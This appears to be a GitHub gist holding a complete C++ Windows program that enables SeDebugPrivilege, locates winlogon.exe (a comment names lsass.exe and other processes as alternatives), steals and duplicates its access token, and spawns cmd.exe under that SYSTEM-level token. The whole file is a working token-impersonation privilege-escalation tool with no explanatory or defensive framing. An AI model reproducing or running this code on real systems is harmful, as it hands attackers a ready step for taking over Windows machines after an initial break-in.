Last active
February 27, 2022 15:34
-
-
Save S3cur3Th1sSh1t/bb17ba24b04668edba75fda4e044f19a to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <iostream> | |
#include <Lmcons.h> | |
#include <cstdio> | |
#include <tlhelp32.h> | |
BOOL SetPrivilege( | |
HANDLE hToken, // access token handle | |
LPCTSTR lpszPrivilege, // name of privilege to enable/disable | |
BOOL bEnablePrivilege // to enable or disable privilege | |
) | |
{ | |
TOKEN_PRIVILEGES tp; | |
LUID luid; | |
if (!LookupPrivilegeValue( | |
NULL, // lookup privilege on local system | |
lpszPrivilege, // privilege to lookup | |
&luid)) // receives LUID of privilege | |
{ | |
printf("[-] LookupPrivilegeValue error: %u\n", GetLastError()); | |
return FALSE; | |
} | |
tp.PrivilegeCount = 1; | |
tp.Privileges[0].Luid = luid; | |
if (bEnablePrivilege) | |
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; | |
else | |
tp.Privileges[0].Attributes = 0; | |
// Enable the privilege or disable all privileges. | |
if (!AdjustTokenPrivileges( | |
hToken, | |
FALSE, | |
&tp, | |
sizeof(TOKEN_PRIVILEGES), | |
(PTOKEN_PRIVILEGES)NULL, | |
(PDWORD)NULL)) | |
{ | |
printf("[-] AdjustTokenPrivileges error: %u\n", GetLastError()); | |
return FALSE; | |
} | |
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) | |
{ | |
printf("[-] The token does not have the specified privilege. \n"); | |
return FALSE; | |
} | |
return TRUE; | |
} | |
std::string get_username() | |
{ | |
TCHAR username[UNLEN + 1]; | |
DWORD username_len = UNLEN + 1; | |
GetUserName(username, &username_len); | |
std::wstring username_w(username); | |
std::string username_s(username_w.begin(), username_w.end()); | |
return username_s; | |
} | |
DWORD FindProcessId(const std::wstring& processName) | |
{ | |
PROCESSENTRY32 processInfo; | |
processInfo.dwSize = sizeof(processInfo); | |
HANDLE processesSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); | |
if (processesSnapshot == INVALID_HANDLE_VALUE) { | |
return 0; | |
} | |
Process32First(processesSnapshot, &processInfo); | |
if (!processName.compare(processInfo.szExeFile)) | |
{ | |
CloseHandle(processesSnapshot); | |
return processInfo.th32ProcessID; | |
} | |
while (Process32Next(processesSnapshot, &processInfo)) | |
{ | |
if (!processName.compare(processInfo.szExeFile)) | |
{ | |
CloseHandle(processesSnapshot); | |
return processInfo.th32ProcessID; | |
} | |
} | |
CloseHandle(processesSnapshot); | |
return 0; | |
} | |
void main() { | |
// Print whoami to compare to thread later | |
printf("[+] Current user is: %s\n", (get_username()).c_str()); | |
std::wstring winlogon(L"winlogon.exe"); // alternatives are lsass.exe, OfficeClickToRun.exe, dllhost.exe and unsecapp.exe and more | |
printf("[!] Searching for WinLogon PID!\n"); | |
DWORD WinPID = FindProcessId(winlogon); | |
printf("[!] Found Winlogon Process ID: %ld\n", WinPID); | |
//char* pid_c = argv[1]; | |
DWORD PID_TO_IMPERSONATE = FindProcessId(winlogon); | |
// Initialize variables and structures | |
HANDLE tokenHandle = NULL; | |
HANDLE duplicateTokenHandle = NULL; | |
STARTUPINFO startupInfo; | |
PROCESS_INFORMATION processInformation; | |
ZeroMemory(&startupInfo, sizeof(STARTUPINFO)); | |
ZeroMemory(&processInformation, sizeof(PROCESS_INFORMATION)); | |
startupInfo.cb = sizeof(STARTUPINFO); | |
// Add SE debug privilege | |
HANDLE currentTokenHandle = NULL; | |
BOOL getCurrentToken = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, ¤tTokenHandle); | |
if (SetPrivilege(currentTokenHandle, L"SeDebugPrivilege", TRUE)) | |
{ | |
printf("[+] SeDebugPrivilege enabled!\n"); | |
} | |
// Call OpenProcess(), print return code and error code | |
HANDLE processHandle = OpenProcess(PROCESS_QUERY_INFORMATION, true, PID_TO_IMPERSONATE); | |
if (GetLastError() == NULL) | |
printf("[+] OpenProcess() success!\n"); | |
else | |
{ | |
printf("[-] OpenProcess() Return Code: %i\n", processHandle); | |
printf("[-] OpenProcess() Error: %i\n", GetLastError()); | |
} | |
// Call OpenProcessToken(), print return code and error code | |
BOOL getToken = OpenProcessToken(processHandle, TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY, &tokenHandle); | |
if (GetLastError() == NULL) | |
printf("[+] OpenProcessToken() success!\n"); | |
else | |
{ | |
printf("[-] OpenProcessToken() Return Code: %i\n", getToken); | |
printf("[-] OpenProcessToken() Error: %i\n", GetLastError()); | |
} | |
// Impersonate user in a thread | |
BOOL impersonateUser = ImpersonateLoggedOnUser(tokenHandle); | |
if (GetLastError() == NULL) | |
{ | |
printf("[+] ImpersonatedLoggedOnUser() success!\n"); | |
printf("[+] Current user is: %s\n", (get_username()).c_str()); | |
printf("[+] Reverting thread to original user context\n"); | |
RevertToSelf(); | |
} | |
else | |
{ | |
printf("[-] ImpersonatedLoggedOnUser() Return Code: %i\n", getToken); | |
printf("[-] ImpersonatedLoggedOnUser() Error: %i\n", GetLastError()); | |
} | |
// Call DuplicateTokenEx(), print return code and error code | |
BOOL duplicateToken = DuplicateTokenEx(tokenHandle, TOKEN_ADJUST_DEFAULT | TOKEN_ADJUST_SESSIONID | TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY, NULL, SecurityImpersonation, TokenPrimary, &duplicateTokenHandle); | |
if (GetLastError() == NULL) | |
printf("[+] DuplicateTokenEx() success!\n"); | |
else | |
{ | |
printf("[-] DuplicateTokenEx() Return Code: %i\n", duplicateToken); | |
printf("[-] DupicateTokenEx() Error: %i\n", GetLastError()); | |
} | |
// Call CreateProcessWithTokenW(), print return code and error code | |
BOOL createProcess = CreateProcessWithTokenW(duplicateTokenHandle, LOGON_WITH_PROFILE, L"C:\\Windows\\System32\\cmd.exe", NULL, 0, NULL, NULL, &startupInfo, &processInformation); | |
if (GetLastError() == NULL) | |
printf("[+] Process spawned!\n"); | |
else | |
{ | |
printf("[-] CreateProcessWithTokenW Return Code: %i\n", createProcess); | |
printf("[-] CreateProcessWithTokenW Error: %i\n", GetLastError()); | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment